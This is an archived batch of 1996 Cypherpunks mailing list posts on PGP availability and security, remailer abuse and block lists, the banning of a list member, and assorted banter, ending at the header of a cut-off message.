Subject: Mixmaster Test
Message-ID: <199611070702.XAA04285@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


Sorry for the spam, folks ... just looking for a mixmaster that puts
the Subject: line into cypherpunk messages.

Name-Withheld-By-Request
Editor in Chief, Cypherpunk Enquirer




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Wed, 6 Nov 1996 23:07:49 -0800 (PST)
To: The Deviant <deviant@pooh-corner.com>
Subject: Re: Sliderules, Logs, and Prodigies
In-Reply-To: <Pine.LNX.3.94.961107043646.339A-100000@random.sp.org>
Message-ID: <Pine.3.89.9611062241.A11917-0100000@netcom9>
MIME-Version: 1.0
Content-Type: text/plain


On the topic of slide rules:
I am looking for a "teacher's" slide rule. The 5 feet long model that 
used to hang off the blackboard. Any idea where to get one? I pay cash.


-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred
   Member JPFO. "America's Aggressive Civil Rights Organization"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 6 Nov 1996 23:05:48 -0800 (PST)
To: Jim Ray <cypherpunks@toad.com
Subject: Re: Judge Kozinski responds to our responses
Message-ID: <199611070705.XAA05794@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  4:39 AM 11/6/96 -0500, Jim Ray wrote:
>Judge Kozinski wrote:
>> ... Perhaps the answer
>> is that the post office should not accept mail unless there
>> is a clear indication of who the sender is on the upper left
>> hand corner of the envelope. ...

In the case of postal mail, return address forgery is so easy that anyone
who can address an envelope can figure it out.  Requiring something
scribbled there certainly wouldn't help protect against anonymous mail. 
You would have to couple it with "is a person" checks to ensure the person
posting it is the person referenced by the return address.  Bye bye corner
post box.


-------------------------------------------------------------------------
Bill Frantz       |                            | Periwinkle -- Consulting
(408)356-8506     |  This space for rent.      | 16345 Englewood Ave.
frantz@netcom.com |                            | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Wed, 6 Nov 1996 23:13:48 -0800 (PST)
To: Dale Thorn <dthorn@gte.net>
Subject: Re: FW: Dr. Vulis is not on cypherpunks any more [RANT]
In-Reply-To: <32817717.4CA6@gte.net>
Message-ID: <Pine.3.89.9611062334.A11917-0100000@netcom9>
MIME-Version: 1.0
Content-Type: text/plain


Amazing how many people on this list are inconsistent in taking their 
medications.

-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred
   Member JPFO. "America's Aggressive Civil Rights Organization"

On Wed, 6 Nov 1996, Dale Thorn wrote:
[elided]
> > Yes.  That's the way it is now, and I think it works very well.
> 
> Works for you.  Which is all you care about.
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: C Kuethe <ckuethe@gpu.srv.ualberta.ca>
Date: Wed, 6 Nov 1996 22:16:42 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: HAPPY GUY FAWKES DAY!
In-Reply-To: <199611060718.XAA11364@idiom.com>
Message-ID: <Pine.A32.3.93.961106224202.67998A-100000@gpu5.srv.ualberta.ca>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 5 Nov 1996, Michael Craft wrote:

> >                           SANDY SANDFORT
> > 
> > On this day in 1605 the Gunpowder Plot was foiled.  Guy Fawkes
> > and his compatriots had intended to blow up Parliment.
> > The English celebrate it because Guy Fawkes failed.
> > I celebrate it because he tried.  :-)
> 
> A terrorist!!!   Call the police!!
> 

Where would we be if he hadn't tried?  I tend to agree with Sandy on this
one.  BTW, I am humor-impaired, so this might be a response taking your
attempt at humor too seriously.

In fact where would we be if a lot of other things hadn't been tried.
George Boole, Charles Babbage, Allan Turing.  They were laughed at/
scorned for trying.  Aren't we all Guy Fawkes in a way?  Cypherpunks I
mean.  I still have faith in us.  I quote the cypherpunks manifesto:

     We don't care much if you don't approve of the software 
     we write.  We know that software can't be destroyed and
     ...shut down.

Idealism and stretching things a bit, maybe, but there is a parallel to be
drawn.  How many of us use crypto illegally and don't care? How many of us
care that it's illegal to use crypto and thats why we do it.  How often
have we seen this propelled overseas in the signatures of cypherpunks:

          RSA in 3 lines of PERL:
          #!/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj
          $/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1
          lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/)

What is this saying?  Well I know one guy who tried to uudecode it and
find out.  But really, it is in a way a Guy Fawkes thing... Big Bro's
being irresponsible, immature, <your adjective here>.  We must show BB
that we do not condone it.

Violence won't work.  Yeah...next C'Punks meeting outside NSA HQ.
Everybody bring your own bombs and guns. That would go over *really* well.
But at least all the papers would write about us.  So we're forced into
something like this.  Export a munition three times daily.  Geez...BB
could really get you hardcore.  And what's even funnier: the
whitehouse.gov autoresponder.  Dear King Billy: I just exported a munition
illegally.  Have a nice day.  And they don't care. Whitehouse just replies
"Thanks. nice letter"  So we, the peons are getting ignored again.  We
should do something to get noticed.

I cried the day I got my drivers licence and social insurance number. THe
gov't now knows who I am... for so many years I was a non-taxable
non-entity who showed up occasionally as someone's dependant at tax time.
Then, suddenly i was a swiftly accessible statistic. EVIL EVIL EVIL.

So saying we salute those who tried makes us terrorists... no.  Guy is
much maligned... and it's a much more efecive way of changing the gov't
than is on lowly ballot.  :)  Statistically that is.  Gee this was almost
on topic.... but really.  Let's try... instead of complain.  And those who
have tried: I salute you.

 --
Chris Kuethe <ckuethe@gpu.srv.ualberta.ca> LPGV Electronics and Controls
http://www.ualberta.ca/~ckuethe/
RSA in 3 lines of PERL:
#!/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj
$/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1
lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/)








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Wed, 6 Nov 1996 23:20:38 -0800 (PST)
To: Lucky Green <cypherpunks@toad.com
Subject: Re: Who is "M"?
In-Reply-To: <Pine.3.89.9611062212.A11917-0100000@netcom9>
Message-ID: <v03007801aea73e330e25@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:38 PM -0800 11/6/96, Lucky Green wrote:
>I met a person named "M" at Tim's party a month ago. Would somebody
>please email me some contact info?
>

"M" was in the U.S., visiting his counterparts in Langley. He popped in to
my party, upon hearing that my Aston-Martin needed a replacement of its
Clipper Chip.

I'm sorry "Q" could not make it, especially as I'd gotten a Q-Clearance
just for this occasion, but he's off in Botswana filming another one of
those dreadful Bond movie.

M. Carling may be the chap you're looking for.

--K!vFP







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com
Date: Wed, 6 Nov 1996 23:26:38 -0800 (PST)
To: AwakenToMe@aol.com
Subject: Re: Is there a Win PGP?
Message-ID: <1.5.4.32.19961107072438.00dad0cc@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:58 PM 11/6/96 -0500, you wrote:
>subject says it all.... Im just wondering is (and where) there is a windows
>version of PGP.. thanks!

There are two separate issues - PGP with a Windows GUI, and 
PGP that really runs as a Windows process, rather than needing
to fire up a DOS window.  There are a dozen or so Windows GUIs for PGP,
many of which are on ftp.ox.ac.uk.  I especially like Private Idaho;
I think the path to it is www.eskimo.com/~joelm/ (also ftp.eskimo.com).
Current version is about 2.8 ; I'm not running it because it dropped
support for ViaCrypt (due to problems with ViaCrypt 4.0), and I like
using ViaCrypt.  I'm also having problems getting the older versions
to work on Windows NT (sigh...)

For a real Windows version, you can buy ViaCrypt (about $100-130?)
At least inside the US, to use the interesting RSA methods except through the
official external interfaces to RSAREF, you need permission from RSA.
Basic PGP for DOS/Unix/Mac has this, but there isn't a blessed Windows 
version except ViaCrypt, a commercial product.  For commercial applications,
you probably also need ViaCrypt anyway.  It was a nice product before they
added Key Escrow support.  Now that Phil has bought them, they'll presumably
return to political correctness on that issue.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com
Date: Wed, 6 Nov 1996 23:39:25 -0800 (PST)
To: Dale Thorn <dthorn@gte.net>
Subject: Re: Information
Message-ID: <1.5.4.32.19961107073726.003d89b0@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>> On Tue, 5 Nov 1996, Edward R. Figueroa wrote:
>> > I'm a new Cyberpunk!
Probably wearing a set of Ono-Sendai eyeballs....

>> > Last,  I would like to know once and for all,  is PGP compromised,  is
>> > there a back door, and have we been fooled by NSA to believe it's secure?

You can read and compile the source code yourself.  
You can learn crypto to help you understand the strength of the
algorithms.  I'd recommend Bruce Schneier's "Applied Cryptography".
You can look for bugs and subtle design flaws along with other people.
There are un-subtle design flaws, like the DOSoid user interface :-), 
and there are philosophical arguments about whether an identity-based
Web of Trust is the right trust model, and practical problems about
how to support revocation correctly, but basically it's Pretty Good Privacy.

On the other hand, there are other threats to think about.
Is there a virus, software bug, or trojan horse that captures the keystrokes 
you type into your computer?  If your passphrase is stolen, you lose.
PGP can't tell; it's just software.  What's on that yellow sticky note?
Is the NSA listening for electronic signals from that dark van
parked out in front of your house?  They're pretty good these days.
Your computer doesn't know, so PGP can't help you with it.
Are you using PGP to keep business records (like that second set of books)
which can be subpoenaed by a court?  When the IRS seizes your computer
and sees all those files with ------BEGIN PGP----- on them, can they
force you to reveal the keys or at least the contents?
PGP can't solve those problems for you.  But it can keep amateurs like
your local police department from reading the files you really care about
until they haul you in front of a court where you can bring a lawyer.

There are applications that PGP doesn't do, like keeping the blocks
on your disk drive automagically encrypted - it just does things to
files when you tell it to.  But you can at least encrypt the critical stuff,
and you can encrypt your email messages and other sensitive files
you transmit across a network.  Won't do any good for IRC...



#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Wed, 6 Nov 1996 19:58:47 -0800 (PST)
To: remailer-operators@c2.net
Subject: Blocking addresses by default
Message-ID: <Pine.LNX.3.95.961106234039.941A-100000@gak.voicenet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

With remailer abuse becoming more popular and remailers going down because of
complaints, there seems to be some interest in remailer software that will
block all email by default and will only pass along email that is explicitly
unblocked.  This way, someone won't receive harassing anonymous email unless
they ask to receive anonymous email.  This would also allow remailers to only
pass along mail that is destined for another remailer.  Looking at the source
code for the various remailers, this doesn't seem to be too difficult.

In the Freedom and Mixmaster remailer programs, there is a function which
determines whether an address is in the block list or not.  Both of these
functions use strstr() to search for the address in each line of the block
list.  In both programs, the strstr() call is within an if statement, so
changing the strstr() to !strstr() should invert the return value for the
blocking function.  I haven't tried this out yet, so there may be some problem
I overlooked.

The Ghio Type I program doesn't require any modification at all.  If my
understanding of the way the dest.block file is processed is correct, a file
such as the following should do the trick:

#dest.block file
*
!address1
!address2
...

All the addresses following the "!" are addresses that anonymous mail can be
delivered to.

Has anyone else managed to implement something similar to this?

Mark
- -- 
finger -l for PGP key
PGP encrypted mail prefered.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMoFtASzIPc7jvyFpAQFN/wgApJOSQpqZylOlfE0SH5HYGxT4hOa41glC
Ce2V67f8KzHOn4iZpS2E+ytOGpetdJ0A+7eZ3DQx/TGrpbOzWihKWMLT1uEWA+En
BxpnRdfJ2lCeW5fYsVhb2alkG1DeSbBSxz53NhzsrlkA+S30joUhV2K3TC0Yc5Zh
eFC2zh72cm0W6uiORCyB7dIRDfQMP9F1Vpa0/fZk7RapDoqmnuS+NxBXqE7TgLMG
KlF+7rWjhFsG1eokdbyAPPiuQdo1HLsxLumonyv6mlzVifsU6p2aFTMH0r5tq9tp
axD66L1D07XwdUFR1zNjifNzeDU+zDq9jrBx+4K/6qPeJoF0XzY4Mg==
=NMs7
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cypherpunks@count04.mry.scruznet.com
Date: Thu, 7 Nov 1996 00:58:52 -0800 (PST)
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: FW: Dr. Vulis is not on cypherpunks any more [RANT]
In-Reply-To: <Pine.SUN.3.91.961106091938.3111C-100000@crl.crl.com>
Message-ID: <199611070819.AAA00995@count04.mry.scruznet.com>
MIME-Version: 1.0
Content-Type: text/plain



Sigh... Yes Cypherpunks is indeed a private list...
yes John is entitled to refuse to have a guest in his
virtual home, and yet some denizens of this list
cant seem to accept that and scream and rant and rave about it..
What dont they understand about the word no? and WHY 
cant these holier than thou "anti-censorship" groupies
simply accept that John has made a choice,
it is his choice to make, and unless I miss my guess about John
(having known him for a few years now) there probably isnt any duress or
coercion that would have the least effect on his choice in fact
it would in the case of John reinforce his intransigent nature.
Perhaps if matters and the list are given a chance to quiet
feelings may change, further harassment of John on this
WONT help. As has been stated MANY times before.
if you dont like this forum go buy your own!

    grumpily
    a cypherpunk
p.s. does anyone get it yet... we are ALL guests,
John does have the right to uninvite someone.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ISP-TV Main Contact <isptv@access.digex.net>
Date: Thu, 7 Nov 1996 00:36:18 -0800 (PST)
Subject: Mike Rawson on ISP-TV's "Real Time"
Message-ID: <199611070836.DAA14943@access5.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


*** ISP-TV Program Announcement:

	Live interview with Mike Rawson, Director of Internet Policy,
	office of U.S. Senator Burns 
***

*** Monday, Nov. 11 ***
*** 9:00 PM ET      ***

Mike Rawson, Director of Internet Policy for the office of U.S. Sen. 
Burns, will be the guest on ISP-TV's "Real Time" interview show this
monday night.  Mike runs Sen. Burns web site, and has been active in the
shaping of legislation aimed at cryptographic liberalization, as well as
bringing hearings on the Pro-Code Bill live over the Internet.  Mike will
share with us the current state of crypto legislation, as well as
speculate on its future in the next Congress.

This video interview can be viewed on the ISP-TV main CU-SeeMe reflector
at IP 205.197.247.33, or other ISP-TV affiliate reflectors listed at
http://www.digex.net/isptv/members.html

See URL http://www.digex.net/isptv for more information about the ISP-TV
Network

To obtain Enhanced CU-SeeMe software, go to:

	http://goliath.wpine.com/cudownload.htm







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Wed, 6 Nov 1996 20:48:28 -0800 (PST)
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Sliderules, Logs, and Prodigies
In-Reply-To: <v03007806aea68cf963af@[207.167.93.63]>
Message-ID: <Pine.LNX.3.94.961107043646.339A-100000@random.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 6 Nov 1996, Timothy C. May wrote:

> At 2:44 PM -0800 11/5/96, Sean Roach wrote:
> 
> >If I remember my history right, the order that math was done often depended
> >on the model of calculator it was done on.  I remember being warned as late
> >as 1991 how some calculators may still still add before they multiply, and
> >to use those parenthesis for good measure, just to be safe.
> 
> Well, it ain't _history_ only--it's also current. Some of us use RPN
> (Reverse Polish Notation) calculators exclusively. (Even my screen
> calculator I use on my Mac is an RPN one.)
> 

Yes, many calculators still have the add/multiply error also.  Most of the
newer generation (the one which I wish I didn't have to be a part of)
doesn't know what RPN is, much less how to use it.

A friend of mine found his father's RPN HP (don't know which model) from
college a week or two ago, and you'd never beleive how long it took me to
convince him that "RPN" really does stand for "Reverse Polish Notation".
As for slide rules, I think I'm the only person at my school who knows
what a slide rule _is_, much less how to use one ;)

 --Deviant
Insufficient facts always invite danger.
                -- Spock, "Space Seed", stardate 3141.9






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila@primenet.com
Date: Wed, 6 Nov 1996 22:10:30 -0800 (PST)
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: Group order for "Secret Power" ... (San Francisco Bay Area only)
In-Reply-To: <v03007800aea4b053298a@[207.167.93.63]>
Message-ID: <199611070610.XAA18229@infowest.com>
MIME-Version: 1.0
Content-Type: text/plain


In <v03007800aea4b053298a@[207.167.93.63]>, on 11/05/96 
   at 12:53 AM, "Timothy C. May" <tcmay@got.net> said:

-.At 1:14 PM -0800 11/4/96, Ernest Hua wrote:
-.>I'm looking for 19 other people interested in "Secret Power" (Craig
-.>Potton Publishers has indicated that there is a discount for 20 or
-.>more copies).  If you are in the San Francisco Bay Area, please
-.>contact me by phone or E-Mail.

-.Just wondering...doesn't such a call for a group purchase of such a
-.dangerous book constitute a RICO (Racketeer-Influenced and Crypto
-.Organizations Act) violation?

-.--Tim May

        I trust your RICO (Racketeer-Influenced and "Crypto" 
    Organizations Act) is tongue in cheek?   The original title was
    "Corrupt" not "Crypto," though I am sure our friendly 'rules for
    them and rules for us' racketeering influenced corrupt organization
    for a government could define it whatever it to suit their
    purpose....

        as to the suggestion/question --how would you contstruct the
    group purchase of a book to involve RICO?   "racketeering" is 
    defined as a criminal association whose purpose is to intimidate 
    others and to deny them theor pursuit of the American dream... 
    (over-simplified).

        maybe they could try "conspiracy" under Title 18 in general,
    maybe attached to "treason?"  -the ACLU would have a field day; and,
    I, for one, would sign up just to get charged with that in mind 
    --even fully understanding that only in the US can you be convicted 
    of the thought of "comspiring" to perform a criminal action.
 
        surprised I am not sent to jail every time I pass a luscious
    expression of feminity or 'hot potato.'  <g>

        although the book is not published here (probably from pressure
    applied by the spooks), the book is not _banned_ here which would be 
    rather difficult to get past the first federal judge, regardless of
    any Jamie Gorelock sniveling claims to national security needs and
    requirements or any of the usual drivel,

        I've seen and been there on stretching the meaning of the 
    charge, both more than one; I've seen feds lie on the stand 
    regarding Miranda and the fifth --and get away with it because their
    credibility is still supreme in the courts 

        the feds still to need some form of charge that is
    "understandable;" and, some compliance with a tame charge --even if
    false, or they expose themselves to the revelation of even more
    information, none of which they want on the table.  trying _us_ on 
    the allegations contained in the book would be a bonanza for us with
    the first evidentiary round!  what a feast!   --no way will the 
    funny farm open up on that one.

        Secondly, even if they charged us, they would be on the defense 
    to try and prove we were "treasonous"  --and they would be trotting 
    out lots of dirty laundrey for the judge, jury, and press (who 
    probably could not give a shit).

        any comment, Brian?
        any comment, Greg?
        any comment, Unicorn?
        any comment, Firssel?
 
--
one of the few things we all share: 
  the utter, corrosive contempt for our elected officials.

--
  Politicians are like diapers.
    They both need changing regularly, and for the same reason.




--
one of the few things we all share: 
  the utter, corrosive contempt for our elected officials.

--
  Politicians are like diapers.
    They both need changing regularly, and for the same reason.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@amaranth.com>
Date: Thu, 7 Nov 1996 03:16:12 -0800 (PST)
To: stewarts@ix.netcom.com
Subject: Re: Is there a Win PGP?
In-Reply-To: <1.5.4.32.19961107072438.00dad0cc@popd.ix.netcom.com>
Message-ID: <199611071228.GAA22584@mailhub.amaranth.com>
MIME-Version: 1.0
Content-Type: text/plain


In <1.5.4.32.19961107072438.00dad0cc@popd.ix.netcom.com>, on 11/06/96 at 11:24 PM,
   stewarts@ix.netcom.com said:

>For commercial applications,
>you probably also need ViaCrypt anyway.  It was a nice product before they added Key
>Escrow support.  Now that Phil has bought them, they'll presumably return to
>political correctness on that issue.

Hmmm I don't think they actually had a Key Escrow Support. My understanding was that
the user could create a master key that could be used to decrypt messages from the
other keys. This was done in responce to the needs of some of their corprate users
that needed a way to decrypt company info. It could be quite devistating if a vip for
company x encrypted vital corporate files and then quit/fired/died and those file
were nolonger able to be retreived.

I am not sure exactly how they had this mechanism set up but I am pretty sure this
was somthing the user had to actively set up as aposed to somthing done automatically
with out the user's knowledge. 

I can see how this could be abused though for a GAK system though I never did see
anything from ViaCrypt that they supported any of the Clipper/GAK crap from our
government.

Does anyone know if you can purchace a commercial license from ViaCrypt/PGP Inc. but
use the standard PGP for commercial purposes?

--
-----------------------------------------------------------
William H. Geiger III  http://www.amaranth.com/~whgiii
Geiger Consulting    WebExplorer & Java Enhanced!!!
Cooking With Warp 4.0

Author of PGPMR2 - PGP Front End for MR/2 Ice

Look for MR/2 Tips & Rexx Scripts
Get Work Place Shell for Windows!!
PGP & MR/2 the only way for secure e-mail.
                            
Finger whgiii@amaranth.com for PGP Key and other info
-----------------------------------------------------------
 
*MR/2 ICE: The best way to accelerate Windows is at escape velocity.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila@primenet.com
Date: Wed, 6 Nov 1996 22:16:33 -0800 (PST)
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: HAPPY GUY FAWKES DAY!
In-Reply-To: <Pine.SUN.3.91.961105123056.18719A-100000@crl.crl.com>
Message-ID: <199611070616.XAA18385@infowest.com>
MIME-Version: 1.0
Content-Type: text/plain


In <Pine.SUN.3.91.961105123056.18719A-100000@crl.crl.com>, on 11/05/96 
   at 12:34 PM, Sandy Sandfort <sandfort@crl.com> said:

-.On this day in 1605 the Gunpowder Plot was foiled.  Guy Fawkes
-.and his compatriots had intended to blow up Parliment.

-.The English celebrate it because Guy Fawkes failed.

-.I celebrate it because he tried.  :-)

        I see, at heart you are still a little boy playing with fireworks?

--
  Politicians are like diapers.
    They both need changing regularly, and for the same reason.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Thu, 7 Nov 1996 07:25:49 -0800 (PST)
To: stewarts@ix.netcom.com
Subject: Re: Information [for new PGP user]
In-Reply-To: <1.5.4.32.19961107073726.003d89b0@popd.ix.netcom.com>
Message-ID: <3281FB84.3560@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


stewarts@ix.netcom.com wrote:
> >> On Tue, 5 Nov 1996, Edward R. Figueroa wrote:
> >> > I'm a new Cyberpunk!
> Probably wearing a set of Ono-Sendai eyeballs....
> >> > Last,  I would like to know once and for all,  is PGP compromised,  is
> >> > there a back door, and have we been fooled by NSA to believe it's secure?

> You can read and compile the source code yourself.

[snip, snip]

Really?  All 60,000 or so lines, including all 'includes' or attachments?

I'll bet you can't find 10 out of 1,000 users who have read the total source,
let alone comprehended and validated it.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Thu, 7 Nov 1996 07:25:53 -0800 (PST)
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: Dr. Vulis is not on cypherpunks any more
In-Reply-To: <Pine.SUN.3.91.961106085914.3111A-100000@crl.crl.com>
Message-ID: <3281FD52.74E9@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Sandy Sandfort wrote:
> On Tue, 5 Nov 1996, Dave Crocker wrote:
> > Actually I think that this view is at the core of the misunderstanding.
> > In fact, we ARE required to suffer fools.

> What you mean WE, white man?  Does this "requirement" include
> John Gilmore?  Must he and his machine be held in hostage to
> the gratuitous flames of Dimitri?  I think not.

> > It is a clear and acknowledged expense for an open society.

> Clear and acknowledged by whom?  Certainly not me.  We are not
> talking about Dimitri's right to speak in open society.  This is
> a private list provided through the generosity of one person.

Sandy is suggesting (demanding?) that all cypherpunks subscribers "accept" without
question or proof John's generosity, i.e., the existence of the list being prima
facie evidence of same.

Well, Sandy, if this were a list sharing cookie recipes or some such thing, I'd grant
you the point, but it's not.  It's a list which would necessarily be watched closely
by neo-government factions such as NSA, and *quite* possibly be a trolling operation.

Please don't come back with the "so why are you here?" argument - after all, I have
my reasons, just like you.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: linefeed@juno.com (Leon W Samson)
Date: Thu, 7 Nov 1996 04:26:55 -0800 (PST)
To: declan@eff.org
Subject: Re: Censorship in Western Australia
In-Reply-To: <Pine.SUN.3.91.961106180814.28883B-100000@eff.org>
Message-ID: <19961106.072440.9598.0.LineFeed@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


please!!!!!!!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paratama@idola.net.id
Date: Wed, 6 Nov 1996 16:30:15 -0800 (PST)
To: cypherpunks@toad.com
Subject: UNSUBCRIBE
Message-ID: <9611070033.AA11809@merak.idola.net.id>
MIME-Version: 1.0
Content-Type: text/plain


UNSUBCRIBE





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 7 Nov 1996 04:38:49 -0800 (PST)
To: cypherpunks@toad.com
Subject: Key to the Future of E-Commerce
Message-ID: <1.5.4.32.19961107123717.006a4320@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


http://techweb.cmp.com/oem/docs/commerce.html

Breaking Into Electronic Commerce [Excerpts]

By Larry Lange

Internet commerce is a riddle wrapped in an enigma. At once the
biggest opportunity the computer and communications industries face in
the latter half of the 1990s, it also represents their biggest risk. ...

The L0pht is about what you'd expect in the way of headquarters for a
motley group of twentysomething computer hackers with Internet
names like Deth Vegtable, Brian Oblivion and Mudge. ...

Mudge and his ilk of brilliant break-in artists believe they play an 
important role as the underground angels of Internet commerce, 
minding the gates to the new digital marketplace. ...

Eric Hughes agrees. As a co-founder of Cypherpunks, Hughes is 
part of a virtual band of code crackers spun out of the Advanced 
Computer Lab at the University of California at Berkeley, connected 
by a regular listserv-group e-mail that reports as many as 60 
security breeches daily. The group's raison d'etre, says Hughes, is 
"evaluating security in the interest of the user.'' His frank appraisal 
of the state of the art in electronic-commerce products is a tonic for 
the hyperbole of the public-relations machine.

"I disagree with the characterization that electronic-security tools 
are in a high state of excellence,'' Hughes says. "In fact, I consider 
the state-of-shelf quite poor and not economical to deploy. Until 
platform security is drastically improved, these kinds of problems 
correctly lead to some queasiness over the widespread use of 
PCs to keep secrets.'' 

Like it or not, the Web denizens like Hughes and Mudge hold the 
key to the future of electronic commerce on the Internet, and 
everyone in the industry knows it. ...

Not all Internet companies are courting the cyber Robin Hoods, 
however. "We're trying to prove that cryptography is powerful and 
can make viable, attractive and commercial propositions, while at 
the same time protecting people's privacy,'' says David Chaum,
"The Cypherpunk approach is the opposite. It's 'We're gonna 
make and break systems and we're gonna debunk things by 
finding weakness in systems.''' 

[Snip balance of longish feature article]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeremiah A Blatz <jer+@andrew.cmu.edu>
Date: Thu, 7 Nov 1996 04:39:34 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Censorship in Western Australia
In-Reply-To: <Pine.SUN.3.91.961106044839.16537A-100000@eff.org>
Message-ID: <0mURVu200YUh02_Y40@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

linefeed@juno.com (Leon W Samson) writes:
> FUCK YOU ALL I WANT OFF OF THID MAILING LIS IT FUCKING SUCKS ALL IT DOES
> IS FILL MY HDD WITH  JUNK MAIL DO YOU THINK I WANT THAT SHIT NO! I
> DONT!!!!!!.....ALL YOU OF YOU ARE COOL BUT THIS THING SUCKS........SEE YA
> COOL D00DS

Probably the worst misspelling of unsuvr, sunsubs, unscrib.. oh, you
know, that i've seen to date. Lotsa bits in that stego...

Jer

"standing on top of the world/ never knew how you never could/ never knew
 why you never could live/ innocent life that everyone did" -Wormhole

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMoHYdckz/YzIV3P5AQFNcAL+OQz/vYY2Xn/l4D+XRRfK5/CfNO24YJ0e
DZBN0J3IdBRj8SSbUGKC83e+6AXk9eAPVaTMK/ew9aALpv5443T2Gx4dJrRVhpj0
OIIyxjMBGidItRCgvban909DtOOgCqUK
=mgsC
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 7 Nov 1996 08:18:27 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Dr. Vulis is not on cypherpunks any more
In-Reply-To: <Pine.SUN.3.91.961106085914.3111A-100000@crl.crl.com>
Message-ID: <75Z1wD2w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Sandy Sandfort <sandfort@crl.com> writes:
> On Tue, 5 Nov 1996, Dave Crocker wrote:
> 
> > 	Actually I think that this view is at the core of the
> > misunderstanding.
> > 
> > 	In fact, we ARE required to suffer fools.
> 
> What you mean WE, white man?  Does this "requirement" include 
> John Gilmore?  Must he and his machine be held in hostage to 
> the gratuitous flames of Dimitri?  I think not.

You are required to suffer fools in order to maintain any sort of
credibility as the proponent of free speech.  John Gilmore has managed
to destroy his credibility.

Of course he's not required to maintain his credibility and is free to
destroy it in any way he wants to.

> This IS a private list, like it or not.  Crying "censorship" or
> "authoritarianism" merely because John handled this differently
> than you would have, is disingenuous to say the least.

Nobody's trying to interfere with John Gilmore's right to practice censorship
on his private mailing list.

But to deny that he's engaging in censorship is disingenuous.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben Laurie <ben@gonzo.ben.algroup.co.uk>
Date: Thu, 7 Nov 1996 01:52:24 -0800 (PST)
To: Ernest Hua <hua@chromatic.com>
